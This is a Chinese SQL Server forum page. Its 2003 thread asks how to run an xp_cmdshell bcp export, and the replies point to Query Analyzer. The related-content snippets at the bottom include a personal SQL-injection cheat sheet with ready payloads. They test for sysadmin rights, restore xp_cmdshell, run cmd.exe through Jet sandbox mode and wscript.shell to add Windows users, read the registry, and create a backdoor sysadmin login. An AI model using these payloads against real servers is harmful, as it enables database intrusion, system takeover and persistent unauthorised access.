社区
MS-SQL Server
帖子详情
EXEC master..xp_cmdshell ..怎么执行呀?
flyboat
2003-12-09 02:43:28
EXEC master..xp_cmdshell 'bcp "SSINSTAL" out D:\DT.txt -c -q -USUN -P'
怎么执行?
见笑了
...全文
297
6
打赏
收藏
EXEC master..xp_cmdshell ..怎么执行呀?
EXEC master..xp_cmdshell 'bcp "SSINSTAL" out D:\DT.txt -c -q -USUN -P' 怎么执行? 见笑了
复制链接
扫一扫
分享
转发到动态
举报
AI
作业
写回复
配置赞助广告
用AI写文章
6 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
flyboat
2003-12-09
打赏
举报
回复
多谢,一会试试
klan
2003-12-09
打赏
举报
回复
要命。。。
C:\MSSQL65\Binn\isqlw.exe
Coolyu0916
2003-12-09
打赏
举报
回复
6.5好像没有master..xp_cmdshell这个存储过程
:(
flyboat
2003-12-09
打赏
举报
回复
查询分析器在哪里?
flyboat
2003-12-09
打赏
举报
回复
补充:是在sql server6。5中
klan
2003-12-09
打赏
举报
回复
放在查询分析器中执行
MS SQL入侵(小心
xp
_
cmd
shell
)
MS SQL入侵(小心
xp
_
cmd
shell
)
SQL-IMP-E
XP
.rar_BCP_E
XP
SQL_SQL imp_imp导入sql文件_out
SQL语句导入导出大全 /** 导入文本文件
EXEC
master
..
xp
_
cmd
shell
bcp dbname..tablename in c:\DT.txt -c -Sservername -Usa -Ppassword /** 导出文本文件
EXEC
master
..
xp
_
cmd
shell
bcp dbname..tablename out c:\DT.txt -c -Sservername -Usa -Ppassword 或
EXEC
master
..
xp
_
cmd
shell
bcp "Select * from dbname..tablename" queryout c:\DT.txt -c -Sservername -Usa -Ppassword
xp
_
cmd
shell
开启与关闭
代码如下:
xp
_
cmd
shell
可以让系统管理员以操作系统命令行解释器的方式
执行
给定的命令字符串,并以文本行方式返回任何输出,是一个功能非常强大的扩展存贮过程。 一般情况下,
xp
_
cmd
shell
对管理员来说也是不必要的,
xp
_
cmd
shell
的消除不会对Server造成任何影响。 可以将
xp
_
cmd
shell
消除: Use
Master
Exec
sp_dropextendedproc N’
xp
_
cmd
shell
’ Go 如果需要的话,可以把
xp
_
cmd
shell
恢复回来: Use
Master
Exec
sp_addextendedproc N’
xp
_
cmd
shel
批量
执行
sql文件
批量
执行
文件里的sql文件的解决方案,来源网络。
冰舞2.6 ASP网站漏洞扫描工具
常用的一些命令: 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('
master
')) And char(124)%2BCast(HAS_DBACCESS('
master
') as varchar(1))%2Bchar(124)=1 -- 数字类型 and char(124)%2Buser%2Bchar(124)=0 字符类型 ' and char(124)%2Buser%2Bchar(124)=0 and ''=' 搜索类型 ' and char(124)%2Buser%2Bchar(124)=0 and '%'=' 爆用户名 and user>0 ' and user>0 and ''=' 检测是否为SA权限 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 检测是不是MSSQL数据库 and exists (select * from sysobjects);-- 检测是否支持多行 ;declare @d int;-- 恢复
xp
_
cmd
shell
;
exec
master
..dbo.sp_addextendedproc '
xp
_
cmd
shell
','
xp
log70.dll';-- select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') //----------------------- //
执行
命令 //----------------------- 首先开启沙盘模式:
exec
master
..
xp
_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 然后利用jet.oledb
执行
系统命令 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select
shell
("
cmd
.exe /c net user admin admin1234 /add")')
执行
命令 ;DECLARE @
shell
INT
EXEC
SP_OAcreate 'wscript.
shell
',@
shell
OUTPUT
EXEC
SP_OAMETHOD @
shell
,'run',null, 'C:\WINNT\system32\
cmd
.exe /c net user paf pafpaf /add';--
EXEC
[
master
].[dbo].[
xp
_
cmd
shell
] '
cmd
/c md c:\1111' 判断
xp
_
cmd
shell
扩展存储过程是否存在: http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM
master
.dbo.sysobjects Where xtype = 'X' AND name = '
xp
_
cmd
shell
') 写注册表
exec
master
..
xp
_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 REG_SZ 读注册表
exec
master
..
xp
_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' 读取目录内容
exec
master
..
xp
_dirtree 'c:\winnt\system32\',1,1 数据库备份 backup database pubs to disk = 'c:\123.bak' //爆出长度 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 更改sa口令方法:用sql综合利用工具连接后,
执行
命令:
exec
sp_password NULL,'新密码','sa' 添加和删除一个SA权限的用户test:
exec
master
.dbo.sp_addlogin test,ptlove
exec
master
.dbo.sp_addsrvrolemember test,sysadmin
MS-SQL Server
34,838
社区成员
254,632
社区内容
发帖
与我相关
我的任务
MS-SQL Server
MS-SQL Server相关内容讨论专区
复制链接
扫一扫
分享
社区描述
MS-SQL Server相关内容讨论专区
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章